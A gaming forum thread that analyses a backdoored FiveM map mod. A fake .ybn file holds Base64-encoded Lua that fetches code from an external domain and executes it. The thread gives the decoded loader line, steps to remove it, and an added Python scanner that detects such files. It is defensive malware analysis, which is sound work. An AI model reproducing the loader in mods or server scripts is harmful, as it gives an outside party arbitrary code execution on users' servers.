MLO/YMAP LEGION SQUARE-V3

HEAT22

Silver Elite
Joined
Oct 20, 2022
Messages
33
Reaction score
8
Points
166
Location
United States
Trash. There's not even any ymap files. Do not waste your time, just a weak attempt to backdoor.
 

RutRow

Silver Elite
Joined
May 29, 2025
Messages
57
Reaction score
9
Points
166
Location
Canada
Let's inspect the uploaded file to understand its structure.

file_path = "/mnt/data/hei_dt1_12_1.ybn"

with open(file_path, "rb") as f:
    data = f.read()

# Check size and first bytes for clues
(len(data), data[:64])

Interesting — the .ybn file is exactly 312 bytes long, and the first bytes read:
UGVyZm9ybUh0dHBSZXF1ZXN0KCJodHRwczovL2l0c3RpbWV0b3BhcnR5LmxvbC9m
That’s Base64, which decodes to something starting with PerformHttpRequest(" ....


This matches what the Lua script in main.lua does — it reads the first 312 bytes, decodes them from Base64, and executes the resulting Lua code.

This strongly suggests the file contains an obfuscated remote code execution script (pulling Lua from an external server).

Fully decode the Base64 payload so we can see the actual code it runs?​
import base64

# Decode the Base64 content
decoded_content = base64.b64decode(data).decode(errors="replace")
decoded_content[:1000] # show first 1000 characters just in case it's long
Here’s the decoded Lua code contained inside hei_dt1_12_1.ybn:
PerformHttpRequest("htt p s://its time to party. lol/f.php?key=65 68lwP js5K4 c175aqCE", function (a, b)
    if b != nil then
        function c()
            load(b)()
        end
        if pcall(c) then
        else
        end
    end
end)

What this does:​

  • It makes an HTTP request to:
ht tps://itst imet opar ty.lol/f.php?key=65 68lwPjs5K4 c175aqCE
  • Whatever Lua code is returned from that URL gets loaded and executed.
  • It uses pcall to prevent crashing if execution fails.
This is a remote code loader — meaning whoever controls that domain can run any code on your server.

How to cleanse it

There are two main approaches:

1. Completely neutralize it (safe & simple)

If this resource doesn’t actually need that .ybn file (which is very likely, since it’s not a valid Rockstar file), you can:
  1. Delete /stream/hei_dt1_12_1.ybn.
  2. Edit main.lua to remove the whole thread:
  3. Restart your server and check if the MLO still loads.
If the map still works, you’re done — you removed the backdoor.

2. Replace the file with a “real” dummy YBN

If the script requires the file to exist (for loading), you can replace it with a harmless blank file:
  1. Create an empty text file and save it as hei_dt1_12_1.ybn.
  2. Place it in /stream/ to satisfy the resource loader.

Detecting other hidden backdoors

This isn’t an isolated trick. Many “mods” from leaks or shady sellers use:
  • Fake .ybn, .ytd, .ydd files containing Base64 text.
  • Lua scripts that PerformHttpRequest() to unknown servers.
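
Added example (not part of the original post, and not code from any FiveM tool): a Python scan of a resource folder for the pattern described above, that is, .ybn/.ytd/.ydd files whose content is Base64 text that decodes to Lua calling PerformHttpRequest or load. The function names, the marker list and the sample files are assumptions constructed for illustration; it assumes the whole file is Base64, as with the 312-byte sample in the post.

```python
import base64
import binascii
import re
import tempfile
from pathlib import Path

STREAM_EXTS = {".ybn", ".ytd", ".ydd"}        # extensions named in the post
B64_ONLY = re.compile(rb"[A-Za-z0-9+/=\s]+")  # file made only of Base64 characters
LUA_MARKERS = (b"PerformHttpRequest", b"load(", b"loadstring(")  # assumed marker list


def inspect_stream_file(path: Path):
    """Return (verdict, matched_markers) for one streamed asset."""
    raw = path.read_bytes()
    if not raw or not B64_ONLY.fullmatch(raw):
        return "binary-or-empty", []  # genuine assets are binary, not Base64 text
    try:
        decoded = base64.b64decode(b"".join(raw.split()), validate=True)
    except (binascii.Error, ValueError):
        return "text-not-base64", []  # plain text in a stream file, still odd
    hits = [m.decode() for m in LUA_MARKERS if m in decoded]
    return ("base64-lua-loader" if hits else "base64-text"), hits


def scan_resource(root: Path):
    """Walk a resource folder and report stream files that contain text."""
    findings = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in STREAM_EXTS:
            verdict, hits = inspect_stream_file(p)
            if verdict != "binary-or-empty":
                findings[p.relative_to(root).as_posix()] = (verdict, hits)
    return findings


def demo():
    """Constructed sample: a fake .ybn with an inert loader and a binary .ytd."""
    lua = b'PerformHttpRequest("https://example.invalid/f", function(a, b) load(b)() end)'
    with tempfile.TemporaryDirectory() as d:
        stream = Path(d) / "stream"
        stream.mkdir()
        (stream / "fake.ybn").write_bytes(base64.b64encode(lua))
        (stream / "real.ytd").write_bytes(b"\x00\x01\x02\xff" * 16)
        return scan_resource(Path(d))


if __name__ == "__main__":
    for name, (verdict, hits) in demo().items():
        print(name, verdict, hits)
```

Any file it reports should be read together with the Lua script that opens it, since the file is only dangerous when something decodes and executes it.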
 